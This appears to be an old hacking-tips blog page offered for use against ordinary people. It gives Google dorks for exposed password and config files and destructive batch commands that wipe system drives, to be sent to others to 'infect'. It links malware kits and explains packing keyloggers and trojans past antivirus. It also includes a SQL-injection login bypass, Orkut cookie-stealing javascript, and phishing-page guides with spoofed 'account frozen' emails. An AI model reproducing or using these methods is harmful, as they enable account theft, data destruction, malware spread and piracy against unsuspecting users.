"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.

METHOD 2

put this string in google search:

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.

Example: ?intitle:index.of? mp3 jackson

METHOD 3

put this string in google search:

inurl:microsoft filetype:iso

You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…

"# -FrontPage-" inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!

"AutoCreate=TRUE password=*"
This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/

"http://*:*@www" domainname
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net

"http://*:*@www" bangbus or "http://*:*@www"bangbus

Another way is by just typing
"http://bob:bob@www"

"sets mode: +k"
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.

allinurl: admin mdb

Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!

allinurl:auth_user_file.txt
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)


intitle:"Index of" config.php
This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.

eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.

intitle:index.of.etc
This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!

filetype:bak inurl:"htaccess|passwd|shadow|htusers"
This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).
Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.

Let's pretend you need a serial number for windows xp pro.

In the google search bar type in just like this - "Windows XP Professional" 94FBR

the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.

or if you want to find the serial for winzip 8.1 - "Winzip 8.1" 94FBR

AddThis Social Bookmark Button


Reset Vista and XP Admin Passwords  

Monday, November 24, 2008

Reset Vista and XP Admin Passwords Info: If you ever forget your computer's password this little program will reset it on restart. Small .iso file less than 5 MBS!! Put it on a cd or a usb drive and Enjoy it!!! Simple Instructions to boot via CD: This can be burned to CD using basically any burner program you like that support writing ISO-images. The CD will boot with most BIOSes, see your manual on how to set it to boot from CD. Some will auto-boot when a CD is in the drive, some others will show a boot-menu when you press ESC or F10/F12 when it probes the disks, some may need to have the boot order adjusted in setup. Simple Instructions to boot via USB: 1. Copy all files from this CD onto the USB drive. It cannot be in a subdirectory on the drive. You do not need delete files already on the drive. 2. Install the bootloader: On the USB drive, there should now be a file "syslinux.exe". Run this from a command line, like this: j:\syslinux.exe -ma j: replace j with some other letter if your USB drive is on another drive letter than j: If it says nothing, it did install the bootloader. Tested CD and USB method with success! Download Link : - http://rapidshare.com/files/149693846/xp-vista-pw_reset.rar

AddThis Social Bookmark Button


IF YOU ARE NOT A PREMIUM USER ON RAPIDSHARE:  

Tuesday, November 4, 2008

Get 1 Year FREE Rapidshare Account HERE

1. Go to the page you want to download
2. Select FREE button
3. In the address bar put the following: javascript:alert(c=0)
4. Click OK
5. Click OK to the pop-up box
6. Enter the captcha
7. Download Your File

OR Go To These Links And Type In Your Download

1. khongbiet.com (.com currently out of bandwidth)
2. rapidhack (.com / .de)
3. free-premium-links (.com 5attempt /day)
4. Rapidshare.co.in ( .com 5 attempt / day)
5. http://www.downloadmyupload.com
6. http://computeraxes.com/rapid
7. http://www.premiumrapid.com
8. http://www.rapidshack.us/
9. http://megaez.com/
10. http://khongbiet.com/
11. http://mymegalink.net/
12. http://rapid-hook.com/
13. http://www.rapidl.com/
14. http://www.rapidrip.com/
15. http://www.rapidsharepremiumlinkgenerator.com/
16. http://rapidlysharing.com/
17. http://www.rapidshareplus.com/
18. http://www.fastlister.net/rs/
19. http://www.lcheat.com/rs7/
20. http://rapid-ripping.com/
20. http://x92.org/
21. http://www.rapidleechers.com/
22. http://www.rapidshare-premium-downloader.com/
23 http://www.premium4me.com/rapid.html
24. http://www.premiumrapid.com/rapid.html
25. http://www.download-crazy.com/rapid
26. http://www.grab-w.net/
27. http://www.t5f.net/
28. http://www.rapid-premium.wb.st/

AddThis Social Bookmark Button


How to Format A HDD With Notepad  

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.

Step 1.
Copy The Following In Notepad Exactly as it says01001011000111110010010101010101010000011111100000

Step 2.
Save As An EXE Any Name Will Do

Step 3.
Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest
cant spoonfeed
its working

Do not try it on your PC. Don’t mess around this is for educational purpose only

still if you cant figure it out try this

go to notepad and type the following:

@Echo off
Del C:\ *.*|y

save it as Dell.bat

want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

AddThis Social Bookmark Button


Hacks to Beat Rapidshare Download Limits and Waiting Time  

Here are some hints to help you more efficently use rapidshare. Skipping waiting time and bypassing download limits are rapidshare hacks that everybody should know.

Here are some methods for doing this:

1. Short-Out the JavaScript:

    1. Goto the page you want to download
    2. Select FREE button
    3. In the address bar put the following: javascript:alert(c=0)
    4. Click OK
    5. Click OK to the pop-up box
    6. Enter the captcha
    7. Download Your File

2. Request a new IP address from your ISP server.

    Here’s how to do it in windows:
    1. Click Start
    2. Click run
    3. In the run box type cmd.exe and click OK
    4. When the command prompt opens type the following. ENTER after each new line.
    ipconfig /flushdns
    ipconfig /release
    ipconfig /renew
    exit

    5. Erase your cookies in whatever browser you are using.
    6. Try the rapidshare download again.

    Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. To be honest, I do not know how to do this in linux/unix/etc. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

3. Use a proxy with SwitchProxy and Firefox:

4. Use an anonymous service:

    Running your system through the tor network should in theory work; however, it is difficult to use and setup. Plus, you allow others to run their evil deeds through your system as well by using this system. Anonymizer 2005 is inexpensive, easy to use, but not free. Other pay services would likely work as well.

5. You can use a bookmarklet to stop your wait times:

    1. Open IE
    2. Right Click On This Link
    3. Select Add to Favorites
    4. Select Yes to the warning that the bookmark may be unsafe.
    5. Name it “RapidShare No Wait”
    6. Click on the Links folder (if you want to display it in your IE toolbar)
    7. Click OK
    8. You may need to close and reopen IE to see it
    9. Goto rapidshare and click the bookmarklet when you are forced to wait

AddThis Social Bookmark Button


Change XP Passwords  

NOTE: This only works for XP home edition.

If you want to change a password on your computer all you have to do is follow these directions very carefully.

1.) Go to start.
2.) Press “run”
3.) Press “cmd”
4.) After cmd.exe comes up, type “net user” and press enter.
5.) It will show all users on your computer. Pick the user from the list and type “net user (name of person)
(and the new password you want.)”
6.)Enter. It will say “The command completed successfully.”
7.) Test it.

Good Luck!

AddThis Social Bookmark Button


Get Your Friends internet passwords  

This is Really Amazing. I was moving through my Browser’s settings and found the file where all the passwords are stored. I was really shocked that it allowed me to have a look at all the Username and Password which I had asked my computer to remember which also included my Internet Username and Password. But this is only possible in Mozila Firefox.

To Hack your friends Password you only need even less than a minute and you can have a quick look at your friends Usernames and Passwords.

Just follow the following steps:

1. Open Mozila Firefox
2. Goto Tools -> Options
3. In that goto Privacy -> Passwords.
4. There you will find View Saved Passwords Button Click on it.
5. It will show you a list of websites with the usernames. To get the Passwords Click on Show Passwords Button.
6. Now To get the Internet Password Just see for any IP address in the website column this is the Ip address of that computer and Username and Pass is what you want.
7. You can get pass of any account just look for the site name whose password you want to hack and on the right side you will get the Username and Password

AddThis Social Bookmark Button


How to Hack Gmail or Yahoo or Hotmail or Any Other (Old Version)  

There is a new version of this hack which is posted here. This version is also completely working but the new version is better than this one.There are different methods for Hacking Gmail or Yahoo or Orkut or Any Other site. But this method is more popular because it can be used to Hack any of the above sites just you need to make some minute changes. Moreover you don’t require any software or anything you can do it you using all the basic tools which present in a normal computer. Just follow the following steps :

  1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com
  2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text.
  3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
  4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with (form action=”xxxxxxxxxxxxxxxxxxxxxxxxxxxxx”)
  5. Delete the above code and paste the your id.
  6. Now save the file. You can test whether its working or not. Just open the yahoofake.html file and in the place of user name and password, type some thing and sign in. you will get the passwords in your mail id.. check out..
  7. NOW UPLOAD the yahoofake.html page using GOOGLE PAGE Creator or using www.50webs.com
  8. After uploading you have to give the link to your friends, once they sign in you ll get the passwords of your friends id.

AddThis Social Bookmark Button


Send Fake Emails  

Always Wanted To Get Revenge On Someone?

Send A Fake Email Through Deadfake.com

Try It out!

AddThis Social Bookmark Button


Hardcore Virus Makers  

Download: http://www.megaupload.com/?d=6YPTOAXR


Mirror: http://rapidshare.com/files/29541835/TeraBIT_VM_2.8.zip.html

Image

Code: Select all
http://www.megaupload.com/?d=Y356K5W7

Image

Code: Select all
http://jeyjey.persiangig.com/Download/JPSVM3.zip

How To Get Virus Off
You may have thought it was funny at first but that virus that you opened that was supposed to be a joke doesnt go away very easily. If you restart your computer it will start again. Heres what you do.

1. Go into processes and end the process csmm.exe
2. Go to the toolbar and click start.
3. My computer
4. C:
5. Windows
6. System 32
Now once your in system 32 there will be A LOT of files. Go to the one that says csmm and delete it. Then you can restart your computer and the virus wont start again

AddThis Social Bookmark Button


6000 Virus ready to use  

:twisted:

Sorry i did not want to write a list to many Tongue

after you exetracted the 6000 virus folder there is one more folder called _DANGEROUS_ [DONT RUN ANY] that is holding them ..

THIS IS A WARNING DO NOT RUN ANY OF THE EXE FILES INSIDE FOLDER _DANGEROUS_ [DONT RUN ANY] THERE AS YOU WILL AND MAY DAMAGE YOUR SYSTEM

If you run one by mistake and f**** your PC don’t come to me going off you should have been carefull when in folder _DANGEROUS_ {DONT RUN ANY}

- Download linkz

- > megaupload.com !
- > mediafire.com link !

AddThis Social Bookmark Button


Super Bluetooth Hack  

Super Bluetooth Hack v1.07

With this java software you can connect to another mobile and ….

Once connected to a another phone via bluetooth you can:
- read his messages
- read his contacts
- change profile
- play his ringtone even if phone is on silent
- play his songs(in his phone)
- restart the phone
- switch off the phone
- restore factory settings
- change ringing volume
- And here comes the best
Call from his phone” it includes all call functions like hold etc.

Notes:
1.) When connecting devices use a code 0000
2.) At start of programm on smartphones do not forget to turn on bluetooth before start of the mobile .

Download: 111kb

http://rapidshare.com/files/69356389/SBH.v1.07.rar


Mirror1:

http://w13.easy-share.com/14502671.html


Mirror2:

http://www.megaupload.com/?d=R0SEV5PU
Mirror 3:

http://www.mediafire.com/?3wnbowtbmku

Pass: www.dl4all.com

AddThis Social Bookmark Button


Enable Right Clicks on The Sites That Disable it  

Lots of web sites have disabled the right click function of the mouse button… it’s really, really annoying.
This is done so that you don’t steal (via right-click->save picture) their photos or images or any other goodies.
Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.
It’s easy to change, assuming your using IE 6:
Click “Tools”->”Internet Options” Click the “Security” tab Click “Custom Level” Scroll down to the “Scripting” section Set “Active Scripting” to “disable” Click “Ok” a couple of times. You’ll probably want to turn this back to “enable” when your done… ’cause generally the javascript enhances a website

AddThis Social Bookmark Button


Secret Backdoor to Many Websites  

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first….
The lesson you should have learned here is: Obviously Google can go where you can’t.Can we solve this problem? Yes, we can.
We merely have to convince the site we want to enter, that WE ARE GOOGLE. In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.How then, can you disguise yourself as a Googlebot? Quite simple:
by changing your browser’s User Agent.
Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.

*********************************************

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Internet Settings5.0User Agent]
@=”Googlebot/2.1″
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Internet Settings5.0User Agent]
@=”Googlebot/2.1″
“Compatible”=”+http://www.googlebot.com/bot.html

***************************************************

Please Remove The Spaces Between CurrenVersion Internet Settings

“Voila! You’re done!You may always change it back again….
I know only one site that uses you User Agent to establish your eligability to use its services, and that’s the Windows Update site…
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:

******************************************

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet Settings5.0User Agent]
@=”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

AddThis Social Bookmark Button


Hack Websites  

NOTE: Works Only On Certian sites

If you have the html and javascript knowledge then you can access password protected websites. So you want to know how??
keep reading…..
1. Open the website you want to hack. Provide wrong username-password in its log in form.
(e.g : Username : me and Password: ‘ or 1=1 –)
An error will occur saying wrong username-password. Now be prepared
Your experiment starts from here…
2. Right click anywhere on that error page =>> go to view source.
3. There you can see the html codings with javascripts.
4. There you find somewhat like this….<_form action="”..login….”">
5. Before this login information copy the url of the site in which you are.
(e.g :”<_form……….action=http://www.targetwebsite.com/login…….>”)
6. Then delete the javascript from the above that validates your information in the server.(Do this very carefully, ur success to hack the site depends upon this i.e how efficiently you delete the javascripts that validate ur account information)
7. Then take a close look for “<_input name="”password”" type="”password”">”[without quotes] -> replace “<_type=text> ” there instead of “<_type=password>”. See there if maxlength of password is less than 11 then increase it to 11 (e.g : if then write )
8. Just go to file => save as and save it any where in your hardisk with ext.html(e.g: c:chan.html)
9. Reopen your target web page by double clicking ‘chan.html’ file that you saved in your
harddisk earlier.
10. U see that some changes in current page as compared to original One. Don’t get worried.
11. Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]
Congrats!!!!!! You have successfully cracked the above website and entered into the account of Ist user saved in the server’s database.
*****[Please read "_form"="form" & "_type"="type" & "_input"="input" without quotes]
The above trick won’t work on the websites using latest technique to protect there servers. Still you may find some websites to use this trick. Enjoy!!!!
WARNING: We post this trick just for your educational knowledge only. Don’t misuse it other wise you will be in trouble. I take no responsibility of usage of the above trick]

AddThis Social Bookmark Button


Google - Peep Into Other’s Email Boxes  

The idea is, one Google advanced search string is filetype: . It is used to find out any file only. Now I’m using this string as a tool,
I am searching for filetype:eml eml intext:”Content-Type: image/jpeg”.
Look at the keyword. It is finding a file with extension eml and that eml should have a Line Content-Type: image/jpeg. Now remember the old days, MIME encoding of a email. When ever we are attaching a .jpg file, that line should come in .eml file. So, the full keyword is searching for filename any with extension .eml which is email file extension, and it should contain a .jpg file, may be some photo or other picture from the web. You can’t belive if you are not checking it yourself.

Keyword : filetype:eml eml intext:”Content-Type: image/jpeg”

Here is ur example:

Click Here


AddThis Social Bookmark Button


How to make ALL Trojan/Virus/Keylogger UNDETECTABLE  

This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be found harmful, NOT. This tutorial explains how to make all files look %100 clean (become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!! ALL!!!!!)Ready? GO!

First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever.

My personal favorite
keylogger: Ardamax Keylogger
Remote Administration Tool (Must not have a router): Poisin Ivy
Google is your friend.

Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED!

1. Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here:
Code:
http://nct.digitalriver.com/fulfill/0161.001

There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.)

2. Once you download the program, install it.
3. Once installed, you open it up and see this:
Code:
http://img339.imageshack.us/img339/6…assportzh3.jpg

This is the program. Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!

1. Download this pre-made settings. These settings are pre-made by me so you won’t be confused. Everything is working.

DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:
Code:
http://rapidshare.com/files/8749860/projects.arm.html

DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the projects.arm file) YOU NEED THIS FILE ALSO!
Code:
http://rapidshare.com/files/8750048/projects.Stats.html

Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).

Where it says “Files to Protect” (if theres stuff there, delete it):
Add the files you want to make %100 UNDETECTABLE!!

Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK.

Now, once its created, they are %100 undetectable. Go to
Code:
virustotal.com
to scan it with every Antivirus, and they wont find ANYTHING!


„It takes a long time to learn simplicity.“

AddThis Social Bookmark Button


Hack Orkut Accounts  

If This Doesn’t Work, Please Refer To The “Hot To Hack Gmail, Yahoo, Hotmail, Orkut, or any other” Post - It Has Been Tested, And It Works

First get firefox and the cookie editor plugin for it…u will need them…

Then make two fake accounts…u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised…the choice is yours though..

javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101));
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;
nobody.submit()

U see the 62915936 part? Thats the one u need to edit to get the cookie to your account…..

Now here is the script Code:

HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:

1) Go to YOUR ALBUM section.

2) Go to ANY photo and right click on it , see the properties of your display image…u will see something like 12345678.jpg

3) There will be a eight digit value.

4) Now put that value in the above javascript.

5) Thats it.

Now your javascript will look like:

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101));
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;
nobody.submit()

Now give this script to the victim , ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook.

Now after getting a cookie…

1) Go to your home page

2) Open the cookie editor plugin(TOOLS–>COOKIE EDITOR).

3) Type orkut in the text box and click filter/refresh.look for orkut_state cookie.

4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part…

5) THATS IT!!

ANOTHER SCRIPT : (100%working)

javascript:nobody=replyForm;nobody.toUserId.value=53093255;

nobody.scrapText.value=document.cookie;nobody.

action=’scrapbook.aspx?Action.submit’;nobody.submit()

Put ur eight digit number in the place of (53093255)

AddThis Social Bookmark Button


Fake Voice Changer  

Fake Voice 1.08

Fake Voice is a voice changer software which changes your voice to male, female, old, young, hard, shrill, or some one new. If you are female and want to sound like male or if you are male and want to sound like male, this is your tool. You can apply robotic effect to sound like alien or echo effect to sound like you speaking from a well or tunnel. Whether you like you have fun with your friends or you want to improve your voice quality for audio recording, this tool give you full control over your voice.

Download: 4.35 MB

http://rapidshare.com/files/85807298/1920FV.v1.0.8.rar


Mirror1:

http://w15.easy-share.com/15675441.html


Mirror2:

http://www.megaupload.com/?d=H0FMUQH8


Mirror3:

http://www.mediafire.com/?bmdzz5i0mht


Pass: www.dl4all.com

AddThis Social Bookmark Button


How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other  

In the previous version of “how to hack gmail or yahoo or hotmail or any other” One problem faced was that whenever the victim clicks on login a message would come saying “This page will send your information through email” which could sometime fail your hack.But in this new version this problem is eliminated and this is has become more fullproof than the previous version.

First of all you need to create an account in a form handling service. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.Now follow the following steps :

1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com
2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text.
3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with

( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”))
5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)
put the following code after placing your form id:



Now Save the yahoofake.html.

To hack the victim’s password and username the victim has to login through this page. Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.

First of all upload your page using some free webhosting services.

Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site name.webhost.com”. Now select your site name as mail.yahoo.com/support.
You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.

Now send a fake mail from support_yahoo@yahoo.com to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.

After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked. If you have your own ideas plz write it as comment to this post. Your participation is always appreciated.

Good Luck !

AddThis Social Bookmark Button


FAKE - Hack Password for Yahoo, Google, Gmail, AOL and MSN  

DON’T TRY THIS, THIS IS AN EXAMPLE OF WHAT NOT TO DO

Go to the “How to hack Hotmail, Gmail, Yahoo, Orkut Or Any Other Post” Instead

*********************************************************************

It is possible and it is easy. This way of hacking into email. I have tried the method.

If it doesn’t work for you, go to the “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other” post

STEP 1- Log in to your own yahoo account. Note: Your account must be at
least 30 days old for this to work.

STEP 2- Once you have logged into your own account, compose/write an e-mail
to: pass_retrive_cgi@yahoo.com This is a mailing
address to the Retrivepassword. The automated server will send you the password that you have ‘forgotten’, after receiving the information you send
them.

STEP 3- In the subject line type exactly: ” PASSWORD RECOVERY “

STEP 4- On the first line of your mail write the email address of the person
you are hacking. STEP 5- On the second line type in the e-mail address
you are using.

STEP 6- On the third line type in the password to YOUR
email address (your OWN password). The computer needs your password so it
can send a JavaScript from your account in the Yahoo Server to extract the
other email addresses password. In other word the system automatically
checks your password to confirm the integrity of your status. The process will be done automatically by the user administration server.

STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly:
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}

so for example if your yahoo id is : David_100@yahoo.com and your password
is: David and the email address you want to hack is: test@yahoo.com then
compose the mail as below:

To: pass_retrive_cgi@yahoo.com
bcc: cc: (Don’t write anything in cc,bcc field)

Subject: ” PASSWORD RECOVERY “

test@yahoo.com
David_100@yahoo.com
David
cgi-bin_RETRIVE_PASS_KEY_CGI_BIN/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}

The password will be sent to your inbox in a mail called “System Reg Message” from “System.

For Gmail:
To: key.admin.cgi@gmail.com
Sub: Password Request : Test@gmail.com

Rest as in yahoo

AOL and MSN will be alive soon:

If you are going to execute this, you are fooled. The above steps are false infos. They do not provide you the password. Instead they will actually hack your password: Never be fooled. Never send your password decrypted to any emails.

AddThis Social Bookmark Button


 

Design by Shubham Aka Draco